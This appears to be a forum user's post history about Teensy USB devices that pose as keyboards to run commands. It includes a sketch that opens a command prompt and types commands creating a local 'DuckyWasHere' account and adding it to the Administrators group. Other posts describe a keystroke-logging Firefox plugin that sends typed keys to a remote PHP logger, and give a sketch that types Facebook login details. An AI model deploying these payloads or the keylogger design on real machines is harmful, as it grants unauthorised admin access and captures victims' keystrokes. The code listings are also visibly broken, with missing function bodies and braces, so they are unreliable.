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Posts posted by Elementix

  1. It works great when it does work. I'm not sure what's different about the 2 different computers I tried it on. Both of them were fresh installs of Windows 7 from the same disc. Only firefox installed and nothing else. One's a desktop, and one's a laptop, but only the laptop seemed to install it. Just don't know what could be different..

  2. Well, that's not the problem...I'm on a quad-core machine with 3 gigs of ram. I've tried it on my pc, which is running a 32-bit copy of Windows 7 and I also tried it in 2 seperate virtual machines running a fresh install of XP with firefox installed. It does seems like it's working, but everything is going so fast I can't even see if there are any errors being displayed...

    All I did was change the website path in your code to the path to my logger.txt file and my hosted .php file. That's all I should have to mess with right?

  3. Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts?

  4. You could try looking at the code!

    It's only 219 lines (plus a 7 line PHP script). Much of it is just strings which encode the "payload", which is only 41 lines (about 1400 bytes), mostly a tiny javascript fragment and some XML. He put the plugin files in a subdirectory, so you can look at them naturally instead of inside strings. The plugin is only 3 tiny files totaling 41 lines. The actual javascript code is only 11 lines! There's no large, complex binary. It's all just simple, tiny text files you can look at using any lame program, even Notepad.

    If you'd read the code, it's pretty easy to see those 11 javascript lines just add an "onkey" event listener, which packs every 20 keystrokes into the query string on a HTTP get request to a particular URL. The 7 lines of PHP receives it and puts it into a file. There's some XML which presumably the browser's plugin install process wants. The actual code basically just types these tiny files in, then adds a registry key. Maybe I missed a detail or two, but that's the jist of it.

    If there were ever a scary example of why modern operating systems are going to have to rethink their trust model for HID, this is certainly it. Scary, but pretty amazing, in a creepy kinda of way. If anyone at Microsoft, Apple or any Linux kernel developer doesn't believe blindly trusting all HID devices is a real issue, all they need to do is take one look at this!

    To be honest, I had absolutely no idea a keystroke logging plugin would be so tiny and so simple.

    I also never imagined people would make these kinds of things when I created Teensy. Please please please be responsible with this stuff.

    Well thanks for assuming that I asked a question without looking things over. I DID look at the code, but just because I'm here doesn't mean I know all the in's and out's of how everything works, so chill out with that crap.

    With that being said, are all these files just flashed onto the teensy (besides the php script)? I'm just a bit confused...

  5. If anyone has an Android phone please check out my app I just released in the Android Market... Song Storm Lite... A free version will be release in the next couple days... I have to work out some screen orientation change issues yet and add some more error handling but it works pretty well so far. Just thought I'd let everyone know in case their interested.

    So did your app get removed or something? I tried to find it in the market and through a QR code to the app and nothing. If they are removing it are you going to just post it here? Thanks! Ready to try the app...

  6. Here's another version of w02057's Ducky Script. I'm still learning this whole coding thing, so bear with me. I'm not sure what his code was written in (C??) so I just remade it. There's still no minimizing of the command prompt, but the window doesn't stay open for very long anyway. Feel free to contribute. Credit goes to w02057 tho. :)

    Oh, and can someone tell me what kind of code is below??

    // DUCKY_WAS_HERE - Teensy
    // Based on w02057's Ducky script (Pretty much the exact same thing) - 5/7/2010 - 3:30PM
    int ledPin = 11;
    void setup() {
    pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim
    ledstart(); // lights up when connected
    delay(3000); // delay for computer
    ledstart(); // lights up when payload starts
    d(); // this is a 100ms delay, see below for commands.
    Keyboard.print("cmd"); // Opens cmd prompt
    delay(1000); // delay for prompt to load
    Keyboard.print("net user DuckyWasHere quackquack /add"); //First command (Username/Password)
    Keyboard.print("net localgroup Administrators DuckyWasHere /add"); //Second command
    Keyboard.print("exit"); //Exit cmd
    void loop() {
      // Maybe a flashing LED?
    void enter() {
    void sendClearKeys() {
    // LED command for end of script.
    void ledend(){
    digitalWrite(ledPin, HIGH);
    delay (500);
    digitalWrite(ledPin, LOW);
    delay (500);
    digitalWrite(ledPin, HIGH);
    delay (500);
    digitalWrite(ledPin, LOW);
    // LED command for start of script
    void ledstart(){
    digitalWrite(ledPin, HIGH);
    delay (1000);
    digitalWrite(ledPin, LOW);
    // delay 100ms
    void d(){

  7. Hey guys, here's some code to auto-post a facebook status. Not sure of why you'd want to have the same status posted every time you plug in the teensy, but maybe someone else can build on it. Feel free to contribute to it.

    Cheers! :)

    // Facebook Status Updater - Teensy
    // Based on vulg4h's Facebook script and iann0036's IP to Twitter script - 5/7/2010 - 2:41PM
    int ledPin = 11;
    void setup() {
    pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim
    ledstart(); // lights up when connected
    delay(3000); // delay for computer
    ledstart(); // lights up when payload starts
    d(); // this is a 100ms delay, see below for commands.
    Keyboard.print("http://facebook.com"); // goes to facebook
    delay(6000); // delay for browser to load
    Keyboard.print("FACEBOOK USERNAME");
    Keyboard.print("FACEBOOK PASSWORD");
    delay(9000); // let browser load
      Keyboard.set_modifier(MODIFIERKEY_CTRL); // set browser to search-page
      sendClearKeys(); delay(100);
      Keyboard.print("What's on"); // search for "What's on"  
      Keyboard.set_key1(KEY_ESC); // escape search
      sendClearKeys(); delay(100);
      sendClearKeys(); delay(100);
      sendClearKeys(); delay(100);
      Keyboard.print("FACEBOOK STATUS TO BE POSTED"); // new status content
    void loop() {
      // Maybe a flashing LED?
    void enter() {
    void sendClearKeys() {
    // LED command for end of script.
    void ledend(){
    digitalWrite(ledPin, HIGH);
    delay (500);
    digitalWrite(ledPin, LOW);
    delay (500);
    digitalWrite(ledPin, HIGH);
    delay (500);
    digitalWrite(ledPin, LOW);
    // LED command for start of script
    void ledstart(){
    digitalWrite(ledPin, HIGH);
    delay (1000);
    digitalWrite(ledPin, LOW);
    // delay 100ms
    void d(){

  8. Hey, I'm back again. When I last followed your tutorial I was using XP and it worked great. I've since upgraded to Windows 7 and can't seem to get this to work anymore. I'm following the exact same steps and everything seems to be the same for the most part but once I set the fon to dhcp/bridged I can't seem to connect to it at all through wired OR wireless. Can anyone else confirm this tutorial working on Windows 7? Is there something that I'm missing or need to change? Thanks guys.

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